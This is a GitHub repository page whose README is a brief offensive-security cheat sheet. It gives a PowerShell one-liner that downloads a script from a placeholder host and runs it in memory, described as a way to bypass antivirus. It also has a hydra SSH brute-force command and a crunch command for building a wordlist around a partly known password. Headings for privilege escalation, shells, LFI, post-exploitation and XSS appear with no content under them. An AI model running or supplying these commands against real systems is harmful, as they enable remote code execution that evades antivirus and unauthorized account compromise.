Skip to content

darthann/tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

75 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

tools

few scripts and useful commands

scan

windows

run ps1 script in memory (bypass antivirus) :

  • powershell IEX (New-Object Net.WebClient).DownloadString('http://ip:85/test.ps1')
  • C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe ping ip

bruteforce

  • hydra -l user -P wordlist.txt 192.168.10.130 ssh

generate wordlist from a password with 2 missing characters :

  • crunch 7 7 -t passwo^% >> wordlist.txt

privesc

shell

LFI

post-exploitation

xss

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

Packages

Used by

Contributors

Languages